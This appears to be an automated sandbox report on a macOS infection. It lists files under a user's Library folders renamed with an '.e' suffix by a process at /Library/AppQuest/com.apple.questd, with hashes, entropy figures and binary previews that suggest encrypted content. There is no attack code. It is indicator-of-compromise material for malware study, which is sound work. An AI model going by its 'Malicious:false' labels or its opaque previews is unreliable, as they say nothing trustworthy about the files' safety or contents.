                                                                                                    Preview: .....p..../J9^m..<kRo).......e.\.^SmwE1.cT5.5[..|a.+.f".$.&O.......Vi..qS.."...o..e..;..*h.A.2l.l..' ...rEy.!..m|..G6z.......[.N.uC.N....D\4<oR&'.K7.]t......d.6[m..|..my..:.6..e...}.vx..................D....|.......xV..ZB..ig...d...S.,L.....E..sv..xv..#0..^u..jI.....L.....o5..R7..y5...=..i&...x...&.......ay..:f..y\..@N..9U...S..Gs.......pJ.....................................................................................................................................................
                                                                                                    /Users/ben/Library/Containers/com.apple.mail/Data/Library/Logs/Mail/.2017-05-31_MessageRouter.log.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):370
                                                                                                    Entropy (8bit):5.060707648176948
                                                                                                    Encrypted:false
                                                                                                    MD5:89E971E3425864A1638C75239F4B96F9
                                                                                                    SHA1:7CFFCB3D9E83C1CC6B2AB9A739EF8BA5B88B83C4
                                                                                                    SHA-256:50A1B29A2C5B6CD57597E9D5B4CD5313BAD599C4389F7FC003A93C488832B4C1
                                                                                                    SHA-512:4B554E79FEBBADE3C01341B14F469FB5EEA530E5390C80565F52FD5E06AF9DAA675D414A9D514999483C64CD2E90A4A1AE71F7467DD7406404DE6A7BB1998FA8
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .....p...YE...(..<kRo).......e.\+.T.......d..z.d...P_K..}..8...`.A................D....|.......xV..ZB..ig...d...S.,L.....E..sv..xv..#0..^u..jI.....L.....o5..R7..y5...=..i&...x...&.......ay..:f..y\..@N..9U...S..Gs.......pJ.....................................................................................................................................................
                                                                                                    /Users/ben/Library/Containers/com.apple.mail/Data/Library/Logs/Mail/.2017-05-31_SyncedFileActivity.log.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):474
                                                                                                    Entropy (8bit):5.698920218176667
                                                                                                    Encrypted:false
                                                                                                    MD5:B48E068A082DAAAA6F175750B50F8410
                                                                                                    SHA1:C37BC0198CEFBBC1205DB5933F773C08EF9F4DFD
                                                                                                    SHA-256:9B8165AAF37142A2EA8C64FF08730F791E178032AEE72B0E793944219ABB7764
                                                                                                    SHA-512:9ED4F9A3465E81344C353547DF4FB2C285C127ED57C82BF94271A1B22DF13F7839808CB7E24EF486D60ABA7CFBCD5490F754850D2297324E1B2F799282D2B86B
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .....p..mJ....`(.<kRo).......e.\.o......s.?w........R.O".............k.6....5..f..0U.........p...M....q..<kRo).......e.\.o........e.qv....fs.d......O.%...G."...<V.....T..................D....|.......xV..ZB..ig...d...S.,L.....E..sv..xv..#0..^u..jI.....L.....o5..R7..y5...=..i&...x...&.......ay..:f..y\..@N..9U...S..Gs.......pJ.....................................................................................................................................................
                                                                                                    /Users/ben/Library/Containers/com.apple.mail/Data/Library/Logs/Mail/.2017-05-31_TableViewManager.log.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):490
                                                                                                    Entropy (8bit):5.899978490643654
                                                                                                    Encrypted:false
                                                                                                    MD5:BBF07BD6CED03D31C3E12BC5DB4872F2
                                                                                                    SHA1:BED086EBBC69716576CBBD7CBA4AE4DC0904033F
                                                                                                    SHA-256:A8D53C7473BB1C2EC601A49A0A236B06BC443B50F1CD584E0697FFCA1E8E448A
                                                                                                    SHA-512:C7D0C4F1EF12ACF8A059C9D1B170B9DD3E6E568DB3F6A97832F08F63F344BA5DFB6FA453D7B6EBC8A4DEC9483315A5E84C7ADB62477B4CFE0FD1B972DDDB15F1
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .....p...YE...(..<kRo).......e.\..@M......7.0.CR...d.....3...\.......@K.-.P......O....9.%WO6..J..g.$.I>C?..mf...=..P.E....%..Pv....+7....(..&A....._.9......3..@...H...i..*r...or:|....:..................D....|.......xV..ZB..ig...d...S.,L.....E..sv..xv..#0..^u..jI.....L.....o5..R7..y5...=..i&...x...&.......ay..:f..y\..@N..9U...S..Gs.......pJ.....................................................................................................................................................
                                                                                                    /Users/ben/Library/Containers/com.apple.mail/Data/Library/Logs/Mail/.2017-05-31_TerminationHandling.log.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):1578
                                                                                                    Entropy (8bit):7.421952674483126
                                                                                                    Encrypted:false
                                                                                                    MD5:0CB747FEBE28A98A8C6B7CE5D71B1170
                                                                                                    SHA1:D1656927CB998C0EF278EB719B6F5D28B4C6A746
                                                                                                    SHA-256:982F51A4FB451230CD94011768BB3FD102A898F6D8F2306F22FB75ACEF026FCF
                                                                                                    SHA-512:BEEE3A525A83CF645531C0913EF3D1C32AC30A9CF78BB00836DF407B7F2AA8DE3A4809AE9830C3F62ADC39BB4AA1E1CAA7B3D951A4FB315D7E9EF8D357203C34
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .....p.....I.....<kRo).......e.\.7.=k......k...h......M:7....>>.c.6Fc..k .5.2].U v!njG......X-(..:.....k.`...~.....E..6:+Z.>..k/..a.GO...$+.%.z....pQO......M..4...;...z.X..... Q`...tt.!.Qc......*Y:G.}.#.....d....4..pc...,....7.d...?.,..'.........!............]D.\a..T....N....V....yOd.#".~.7..ehRg. .Mo.Vq}..sU8..._.~+..|j.<..&..<...b..1..(W.!.r...z0...qTY..R..`...~.....E..6:+Z.>..k/..a.GO...$+.%.z....pQO......M..4...;...z.X..... Q`...tt.!.Qc....lc.0..<c..uR!...\.aRrvW.....wt.{.)F9..F...........gcw.{(Q...X....yOd.#"...1@...Q..<...d..1.(..\.....3..JJz..^Y....5,..E..Pm..3q..0......n....b4H.Cd=..#[....Sv...W....tpOi.8.......a..<.z...K.P+.......x.\.......`...~.....E..6:+Z.>..k/..a.GO...$+.%.z....pQO......M..4...;...z.X..... Q`...tt.!.Qc....lc.0..<c..uR!...\.aRrvW.....wt.{.)F9..F...........gcw.{(p/8...?...^..R..;.OX..l..........).m...4Q...X....0U..6zw..1@...Q..<...d..1.(..\.....3..JJz..^Y....5,..E..Pm..3q..0......n....b4H.H.X<.QH....Sv...W....tpOi.8........R.O"..Fq....$.&O.....(.....L..y&....
                                                                                                    /Users/ben/Library/Containers/com.apple.mail/Data/Library/Preferences/.com.apple.mail.plist.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):3354
                                                                                                    Entropy (8bit):7.819905599648888
                                                                                                    Encrypted:false
                                                                                                    MD5:82F0826A29E9B652901C79C88E273396
                                                                                                    SHA1:E48B53BAC0B4DA463884896F327A08253C99C6DE
                                                                                                    SHA-256:1115118963738001A20A6B238B04B69C7426BA8D723A2AAA86A6396587DD433E
                                                                                                    SHA-512:A7DABE427E8025834CCBABD64B9B68B48ED5F2568979C18CD3F5C5F97D2F17D1B817B50CD7B03176AE34E30852DD4A0D86EF39170F654C11472663E51052A917
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..@.7R...,.=...H....th...8...g....z).........y..?.Q......<..xxm^.....-..`35W>H.'.....k.,.b..l.6....FE...8..s.-/"Y...-.../..Yy..7.{.....Wu..AB...=Z....l....`.....Fv.H.6...../.x...0.qQ...~...?.\....6...4...u.6.....//...9.T..Q.@.B....O...E...7GT..a.........g_......f..Q..{@.. ....Z..G......0..-.WX.S.$...v..H....k.e....&L.........i#.N^.............bV........../.,...t.......%!.*~@.b.S...g5.U.s...{...+T.zb0Om...<.o.6.Y..>i.$...C..&....~0A.RJ.)...{^b.6..;....|s....p.K..H.....eF..#)...c..%...^.,.T.NF.Q.:.u.~.t%=......lPS.g...s./.;Z.o..-.w.Cg..,",.({B.......g.....}......_\..9..%!\y.,m..i.hN.m...!.>Y.=.<............;; .8...p...#...x;U.W.hU.b.ak~.s..0~.......w..x.3.Z...|...\.....................E%.U......|.....n.*.nd.8..........7..*.:.D.Z.....?.3{&F......7......0_.L.`G.. P.a.n..I.&.sc...Q...+..3@...\J.....~H...tq..!.o....g..%6r.\.....|}pG.5...o+...._.2..Ax.u\%....$jG>."...j../mH.....A>..w^U0PC.o.z.cZ.cq.."...MX|........$UU.Luq.n....Y..LU......%.....C...kY._.Wt......z........t...0.'........uJ.i..l.
                                                                                                    /Users/ben/Library/Containers/com.apple.mail/Data/Library/Saved Application State/com.apple.mail.savedState/.data.data.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):8394
                                                                                                    Entropy (8bit):7.9193119927669375
                                                                                                    Encrypted:false
                                                                                                    MD5:9627F119E52180A26C2DF42DD3AA52B8
                                                                                                    SHA1:5B8B199E030ED79D8FE448C2B452881C7A32A93C
                                                                                                    SHA-256:0DA4696C50F1D355E4C6905BBBBE4AAA299F65C55F915F1BC64F80BB8320E231
                                                                                                    SHA-512:05AE62CCB7B08461ACA8CBA8A697CF4DDAE3837FDA726A838B62B9A35802CD56FC6A015FDDF3A4C872EC71760DA33809A319D55026E6521D8389EB7A69DC5168
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ....L.Y*B......j\.9e.,}..?..........y4...F........4.t.i.&...{D..C\.'..:.........m.._.9.g....9.z........iX.3.q....^..E......a..]......K..........2.....3.H..@.R....D...V...y.............@.u..e..4....wc5..#W..}..)...T...;..7..Y2....e...s%.*.....^.!...A......7.$..d....\...U.^.iiW/W.-6...Jh.a71....6{.&...8>.m.(..r.;',.6.6..I5.,?.5..YN..Qv.Et..u0Nh=l...C.....'....\.u..../.....;.V;:..D.].RM..f-*...z.E]..s!.",.C..u....`....Tf..!...x..?S....L.Y*..e..9..e..@.=...0#.... .........=.v..."...!...<%-....:.....t`..OR-y*F.%ea.M.f..,j..Q}n..].N....9....k).S*p:Y.>...&+O=..rCS{...a....z...........x...:tH].^...a...wx.K....K(~`..;...?...A.`...[......](....EC....ey.mN......:.>.ye.x=V*2..ZN........p#n...4....m..M..5..|.OR.U#<?..9._k .;.k.d..T^..............qz7Kt....kx:.M...X....O.Q.m....;cc.`......m...xe`3.......$.iK..BB...J-j.?......?............:$~.A{.f<..m...\..........jE.....U.U$./.. \6n!w..2.,...~.\.v..72YVwL{...[....(X\...c.<..x'U....L..vQ,|T1D`..K.4O.8.b.s.....c..;<aO......-.N.8q..P.n..<.x.Cf...1pCJ7..
                                                                                                    /Users/ben/Library/Containers/com.apple.mail/Data/Library/Saved Application State/com.apple.mail.savedState/.window_1.data.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):7690
                                                                                                    Entropy (8bit):7.940702688316696
                                                                                                    Encrypted:false
                                                                                                    MD5:E6A2529D415B54002E8827893B4CE9A6
                                                                                                    SHA1:59719C3194E9DCD63229882FF8FFC45399E0E310
                                                                                                    SHA-256:CCEA16DAB475B9ADBA8C1D33437FB2047BC86F0E04B0A3DBD3B61537A6F48454
                                                                                                    SHA-512:FA5F7AC0B5FA0898DFAC317B1753D6CE7035F13AF4AA6E74E198A9B18FEC13668CFA80B5F22F62524C1D8098D3A6CB8084AE44CA39A6025716FCA38EC64046BC
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..Q...;.t.T....4FE.=qpK..3T..K.....,...........YO.}......H/...W.OL_y@(...!_=.%..(..b+O.t.n.pO..4%b......mAd5.......}.....eL.G...N..J.*L4q.\F.n..hv.u..;.G..k......V8.....Zd.n..Y..._.....x.t..."...%.p..e.r.;4.,{..>..O-.e7K6w..........>.v..-V......P....tt..t...9...,.K..W...-.k[.......@J..I..Mj..9.ro...."...j..R.C...s.m....-...r.u4v^..XOn~....!...Xm^.d8...c4..........*......8/E0$g...".e..b........Ar...B....Q!O..."........./.}/!.u.:T.g.].5...(..'~}&....kS.k4..C.2...C...8..:...P.O.....nDv".........K...k.|B..%|...(.<...E......q..[...@....l.-.../5r.8............}.}.b.kv.x.D....5.E..~H..9k.....T/.....J.....R....t.2..1.A...yr..nj........]..R....2v........<.J..7/.kt`k.......6...1.D`.Dm.F"H......0.WD.............. ...]O..b.$..*.s..WNV......!.i(...."..........%<~...G1i......u}.3.1...E..\nEXNE.}...".t......W<..T [E1.T...2..N(....Ld.L.....F.?..b....C......F...59.b.]0.}%..jG..6<._.8M$.....U..s............uNUt..f-...hFR...I.....j..P.'.b.+...7..t...'...d..jm,"0...={..`.n..J..{.........$....-....i..@..*.
                                                                                                    /Users/ben/Library/Containers/com.apple.mail/Data/Library/Saved Application State/com.apple.mail.savedState/.window_2.data.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):52341
                                                                                                    Entropy (8bit):7.994854781531037
                                                                                                    Encrypted:true
                                                                                                    MD5:241396DC39AD54F86DABBEE6CEA5E83A
                                                                                                    SHA1:D726E876C5AEB3577956B3D7BF0AD6AEEBE20AC7
                                                                                                    SHA-256:6A4483C3208C73F5323C79F2A3D88A186117859EE5AC075EB5EFF8AE3D09F42A
                                                                                                    SHA-512:F428D75EA6222CB9A3C312632ADA99B9EED060EEC9E9443E50B6768BDAF3320A75FEFA1E7B0C824D9953D9FC4D6554BC30D52F618DF2E3A474B6B69AA217E0A1
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: J......\.........AD....U0....q)gY..0U...u.5......=.?...^...w....)L..&..!.u=...L.._.B..}......_.W?....i.-.4.5m...n..P.,1.q..._r.t.D.%3.sIg#N..8....p4.c..>Qq3n.......0j...P....\...1U........*..+.....?RR@.........g...N.^....w...9"...JUT#.P..Mj."l..R4.Xx@.....n....1.I.&Q.5..y......i.....$kA;.o@.`#...5.I..s.[.~....4=.n=..R....I,..S.X...f.Um........../].zX$..!x4..4...?....z.;..P....Z.A..3T.....|.}.d@W'..l.-}...kf;^.]../..T...6..R..?..e;./....fv.P.."..B.y..r...!..............H0.;.@.E.t-..v....N....c....1.@1.....j...;Lz.m....w[?..=.%.z"...K>,..Xhh:6...A."....e.-n..z....Va\......>..@..9$...o.s...z\...8.A*...w'r.|J.B...z.......k...._6.....O.h...@....||....q$...$h|to....>.z.M.,..*.$.O.bD@...ExU...4.z...k..!.K?..\q...+...L....c....p..u.i.$.5i.E..E..B...Z..-.iU..T;B...(.....s'..."G..&.D...~ht..A....W.W.......J...6."......55*<.M.s......o....x.....H.!....X[..9..$a...k}..o.@.8......)SG.":.W...W?....PH.;g.m...J+..~.&.@Y......YT....{98./.?..c.....V.'[?.c...2O.|e7.|.[U..lC..%..x.t(....8/.....sR..E.......
                                                                                                    /Users/ben/Library/Containers/com.apple.mail/Data/Library/Saved Application State/com.apple.mail.savedState/.windows.plist.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):1738
                                                                                                    Entropy (8bit):7.5527867994490965
                                                                                                    Encrypted:false
                                                                                                    MD5:6785C79084FFDBBBBFCBD086EAE434DB
                                                                                                    SHA1:179CFF98A7D9EAEE8D36465E378355DB50D8E134
                                                                                                    SHA-256:1F4B2AF65EEFEC17840B545E3F1DA2A1B16F7E28196D8831D4B5857B35846EB2
                                                                                                    SHA-512:3448E12CA89261C2AC448C947EF8D61B2506DE9CB9E2AFFC18E90B8D15BBF4A363F4021AA8B021497196CC0C6EC6D264B434675F98D21A5E19101B672EEE7744
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..@.7R....H........Po...URm...i....@#.<...'..\.YhZ...&`...a ."....\_.....+.e.....9..Y....C........rJ...9.d.`<sd..........dP........z....gA[......%........."Rz.S...{.O............!........(?`Y.`mF*.Fy......s..........|W...U.6.....h6.:....!H..b)..N...~......qX. ..n...:.]%s......n.h...g..u.bvj.S=u..+BR.&Xl..==.r%.!gB....G...C...+..33GG.s,..#.M.s=.8...x.b.wH{d/...........\.\......R......^.).K..N{....{ .GR...B_..n........bJ]:....0.....~...(m.D.......!AP.....W...r......v.-...'.0..!..<..w....Q9.f.9.W...r......v.-.r.L.... .F..ozn.......Sx...LB.....db.'.............................a.1...'.........;.....t....~....Z...>.u...qku=.r.(H..g..........a.1...'......(XU......t....~..;.H..v..u...qku=.r.(H....+y...D...@l..d.....K..j....$a..l...9......\.\..E...;...G......\W.iS.........Sx...5z..c.!AP.....M7...@..............{r."e&.q..#......Sx*..h..>..6W..l..:..../...Kc....].i.I.D.....[G`54...:Z.EhG...GCb...X.)y.|.h..A.T6.....4.Y..Nh..........SvT....r@D.~.4r..(NWT........l..........h...i........S.c....i.....
                                                                                                    /Users/ben/Library/Containers/com.apple.mediaanalysisd/.Container.plist.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):29155
                                                                                                    Entropy (8bit):7.964719091458142
                                                                                                    Encrypted:false
                                                                                                    MD5:6B25967E8D8CA37F8A22647F922DF859
                                                                                                    SHA1:E11FFF228FA9202510786554D39CE7FAAA539E1E
                                                                                                    SHA-256:19E19657B444FB83243C3A0699070E9E55403C49B2C38C41E2858D8690026C82
                                                                                                    SHA-512:9375BC3DB66C2FA29BF26C66019444589FEA96E0666075804905A7065F16586D7056108A74121E3ED48987799A386D2F3A65624D84EF503476A3AD256850279F
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..@.7R......#f.9sF...-O..........~.]"n....)B.?...\..W..*.4.....zo*..$y.0...~.H.}..z..+..,!k......H...c....R....ge..X.[c.f.O.2..t...T.d......\.....wTk.8p..G.....?.......s9[|..=.*x..+o..4L...ee}Z.-....4.9.O'.O..T.%.1..Z.-....4Z.-....4.....ah.w....(..Z.-....4.\./[.........Zx_...`..n...C.o.;...t.Y....i`Sr..f."...w>y'.{v..\j...im..{.&..|...A...e.......m^U.I(x......I.....Z.-....4.\./[.........Zx......Rb.....sE.......Sk..]ETuLV.Ac.}.........0.s$\*....U}m.yyaq....'V....N.........6...S.F.O..y..2~.......4.].*z9...2..G...t..rl.t.......Z...o_..2~.....).....+59......._.....$........1`..Sk@..=...2.*]`.....TE.smm.....uZ.S./.x[.......J..F_."........51./.....\X`.1.4...V|.i....qp....r....T...Qy."......~U.d..>l:..9....~!......~U.z.......|......7.....~U._oy.H....._......GS.Z/.rpS.GI4h.[D....~........p0@u.i.\Az...w/.6.F....8.Jg...2.A..U.N.kUS.\s....=.n....d6.L...b.....|.. ...%..i[..*.j....V>EyT....C@.MI..Lk.......0c.I...........B..[..........E...Xm?..C2...........H8N......w.+.....`kw~......`.P....v..69..C.
                                                                                                    /Users/ben/Library/Containers/com.apple.photoanalysisd/Data/Library/Caches/.CLSBusinessCategoryCache.sqlite-shm.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):33091
                                                                                                    Entropy (8bit):3.2796670989949335
                                                                                                    Encrypted:false
                                                                                                    MD5:B85F480100363E5E7559D90BB0E3D7BF
                                                                                                    SHA1:9F81CB4B8F3940ECA57599D841E10D6AF70E02F4
                                                                                                    SHA-256:FDF63BBF63A95097433CFB35D8E76AE40A9AAE963A3A47757E922353F217C46C
                                                                                                    SHA-512:22C065C49B19367A05697A85299F038653CE86F9CA97B7ADF5B2FAB18857CEA9074C3573304EC1ED4E4D4F45E2C1E570BA2B6A28FA4B4EADFB2954AC0642297E
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: >.k....L6~Fe.............................\ck?N..>.k....L6~Fe.....................L.D<.+..\ck?N...........9.o..h$.9.o..h$.........................................................................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+.................................................................................................................................................
                                                                                                    /Users/ben/Library/Containers/com.apple.photoanalysisd/Data/Library/Caches/.CLSBusinessCategoryCache.sqlite-wal.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):305
                                                                                                    Entropy (8bit):4.227184134998451
                                                                                                    Encrypted:false
                                                                                                    MD5:4E6BDA8E6124B92D84A6F01E74479435
                                                                                                    SHA1:12E3E61BF223CAD272BAD62FAC40A6742DBA96C3
                                                                                                    SHA-256:67BAB761DDB4F0DE3AD683630D9B76C2ADA7136A36E8D2EC13023A59A9ECC178
                                                                                                    SHA-512:BF8999595A05AF4C039D28E3FC9B6098BA49C95C261448D94009924D636537132610B1975D2A1F972E33651A8F44C186A86CB0D49C51BAAA11D87168B2CEE66E
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .................D....|.......xV..ZB..ig...d...S.,L.....E..sv..xv..#0..^u..jI.....L.....o5..R7..y5...=..i&...x...&.......ay..:f..y\..@N..9U...S..Gs.......pJ.....................................................................................................................................................
                                                                                                    /Users/ben/Library/Containers/com.apple.photoanalysisd/Data/Library/Caches/.CLSBusinessCategoryCache.sqlite.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):61781
                                                                                                    Entropy (8bit):4.058633959668019
                                                                                                    Encrypted:false
                                                                                                    MD5:96E242EA43F2CEA76985352B5EFF8D91
                                                                                                    SHA1:5740F109D34ACE1CADBCE104F22772DC69C4BA29
                                                                                                    SHA-256:E10ABC3DA2C50F3E4582C10B0891AB4729685F14DE0F57158D732AA4013EDB69
                                                                                                    SHA-512:D2AB65822747B0BA0E7F18C7FCE3ABE8539CAC87BBB05C4F2DB050C37E4706C06A9B43E91B004F22A65792F173B92EF1CE67BC5B1690724BB6E042304E5EF287
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .#.1rS..a....lT........tE.4(..............6...<.[e.....At...7...t...7............L.D<.+.......]!,,.<.~...L..\....Eg.i.GG0j...Q........4..........................................................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+.................................................................................................................................................
                                                                                                    /Users/ben/Library/Containers/com.apple.photoanalysisd/Data/Library/Caches/.CLSLocationCache.sqlite-shm.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):33091
                                                                                                    Entropy (8bit):3.2846264328167822
                                                                                                    Encrypted:false
                                                                                                    MD5:962B457896AA0F2F8C9190569FD72BEE
                                                                                                    SHA1:D85627B2F2BF371322A3B97709838475F75BB05F
                                                                                                    SHA-256:8BF6432568C87C8D0EF8318648AD75FCEEBB7D81BC970409D5D21BE9BC7A2B39
                                                                                                    SHA-512:C1A2E54B4C771D3CDD81E7B1D4D128325D262A7635EA16ECC15E79C2934B73367799A6A5C686B7ED956E83AB2CAACDB0614945DB0045FC4E1E776424B83F607F
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: >.k....L6~Fe.............................\ck?N..>.k....L6~Fe.....................L.D<.+..\ck?N...........9.o..h$.9.o..h$.........................................................................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+.................................................................................................................................................
                                                                                                    /Users/ben/Library/Containers/com.apple.photoanalysisd/Data/Library/Caches/.CLSLocationCache.sqlite-wal.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):305
                                                                                                    Entropy (8bit):4.227184134998451
                                                                                                    Encrypted:false
                                                                                                    MD5:4E6BDA8E6124B92D84A6F01E74479435
                                                                                                    SHA1:12E3E61BF223CAD272BAD62FAC40A6742DBA96C3
                                                                                                    SHA-256:67BAB761DDB4F0DE3AD683630D9B76C2ADA7136A36E8D2EC13023A59A9ECC178
                                                                                                    SHA-512:BF8999595A05AF4C039D28E3FC9B6098BA49C95C261448D94009924D636537132610B1975D2A1F972E33651A8F44C186A86CB0D49C51BAAA11D87168B2CEE66E
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .................D....|.......xV..ZB..ig...d...S.,L.....E..sv..xv..#0..^u..jI.....L.....o5..R7..y5...=..i&...x...&.......ay..:f..y\..@N..9U...S..Gs.......pJ.....................................................................................................................................................
                                                                                                    /Users/ben/Library/Containers/com.apple.photoanalysisd/Data/Library/Caches/.CLSLocationCache.sqlite.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):53589
                                                                                                    Entropy (8bit):4.085976563790906
                                                                                                    Encrypted:false
                                                                                                    MD5:986DFF08355433506F454B0444BE3228
                                                                                                    SHA1:AA49229F3B74DD5C3E8180F14922F2068D2151C9
                                                                                                    SHA-256:9632AF3F8CE4DFEEA88C8EB8BDDB9BCC28E678168F4198AD141B02FB7DCD278B
                                                                                                    SHA-512:FBE5F5D0D11581277E76AB1A7D1690F9971C9C9BF6F6623E0D1CD90A8C085402009153465DD2046E4FE8007E1F119D83418A3F68D7918A1D4145E752A1B028E1
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .#.1rS..a....lT........t..S..0...............)q.~./..efrt...7...t...7............L.D<.+.......]!,,.<.~........-..............36.3.,..H`..........................................................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+.................................................................................................................................................
                                                                                                    /Users/ben/Library/Containers/com.apple.photoanalysisd/Data/Library/Caches/.PGCurationCache.sqlite-shm.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):33091
                                                                                                    Entropy (8bit):3.3427237780667722
                                                                                                    Encrypted:false
                                                                                                    MD5:C77D893269EF5E69618B863B2D0563B0
                                                                                                    SHA1:F13844D09AEC13F9C62FE8055BFDDDAC3B4FC55F
                                                                                                    SHA-256:475B0106B2638F7F258F7E01E311970FD81A5609B9D1D543ED619B44CA6B9EA0
                                                                                                    SHA-512:E65D69EACD35F03186C266A566642DD6B1BEFD1FCC63A120651F5D6CFE7948850B339F70FFBB8089743912300BBD8818FE385DBF7B202C0B8B0A92A1C2234EB2
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: >.k....L.*........I.........U.K3.c.\.'..:L.r....>.k....L.*........I.........U.K3J...=.7.:L.r............}.BP..$+.9.o..h$................R...@+{..y.H.....g..gm,._.Y..<.!.......0!8..A............................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+.................................................................................................................................................
                                                                                                    /Users/ben/Library/Containers/com.apple.photoanalysisd/Data/Library/Caches/.PGCurationCache.sqlite-wal.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):49813
                                                                                                    Entropy (8bit):4.2464635044200225
                                                                                                    Encrypted:false
                                                                                                    MD5:A12DA17A87B6A09676EF67FB53DD4898
                                                                                                    SHA1:FD6664C9DFACA5932FDBC87A5F79F97FE5FCCCBE
                                                                                                    SHA-256:35822B0321A480EDD716E78A48523794E063E976FB7DD29A2377123C5428EB63
                                                                                                    SHA-512:D242F274023616045EC7B94485374C9EC2D4E2BD3431E222ADE52A2BF5DA36FE1269819315AB823BF53E5034930AAAFEBA5DB652534F3E37DD43BEF07DEAF29D
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: @....[...L.-$....c.\.'..K...t....bz.Hy.P.c.\.'..s...@X...#.1rS..a....lT........tO$d.....................{...#Rox........t...7.........................]!,,.<.~....%....+.........................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+.................................................................................................................................................
                                                                                                    /Users/ben/Library/Containers/com.apple.photoanalysisd/Data/Library/Caches/.PGCurationCache.sqlite.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):4410
                                                                                                    Entropy (8bit):3.759179369995031
                                                                                                    Encrypted:false
                                                                                                    MD5:A9994D0F518D253574E20C0E552F7A19
                                                                                                    SHA1:AFB6A818A5DD8C15D111720401CB7E079FBDC741
                                                                                                    SHA-256:FB393698600DEB666A115DB5CBBC87637A60BBE93DC61633A8736E353F945BAE
                                                                                                    SHA-512:2094E84C7BDEE99BB7C7E47BCA45B39C4CCA19FA3AA50F41786E2958F8A611A3D99DDDBE60ECB63E4590D6E6037B64E97B7182DD0ACDB08EC2D7FEEFB1B90F44
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .#.1rS..a....lT........tp.v...})................{...#Rox........t...7............L.D<.+.%R4,....,,.<.~....%....+.................................................................................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+.................................................................................................................................................
                                                                                                    /Users/ben/Library/Containers/com.apple.quicklook.ui.helper/.Container.plist.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):32867
                                                                                                    Entropy (8bit):7.967802314414084
                                                                                                    Encrypted:false
                                                                                                    MD5:DFDE65C61FDD6CDC3DC922556C51E962
                                                                                                    SHA1:AD3FA2EB413E69A1017BB3C4626C4BF55CA44F3E
                                                                                                    SHA-256:48E7296F1EC8F6212AFFD6A1BB2927FE10430A079AF217B6194F0E91B6213AC5
                                                                                                    SHA-512:47775F94482A4D987388B622402FE6C8E0AB1891F608F21131030F989CD0D62B856ABCEB3E5B807A9F582DD5FD0C06CC57587D97EED1A3483CA673F37FAC5DDC
                                                                                                    Malicious:false
                                                                                                    Reputation:low
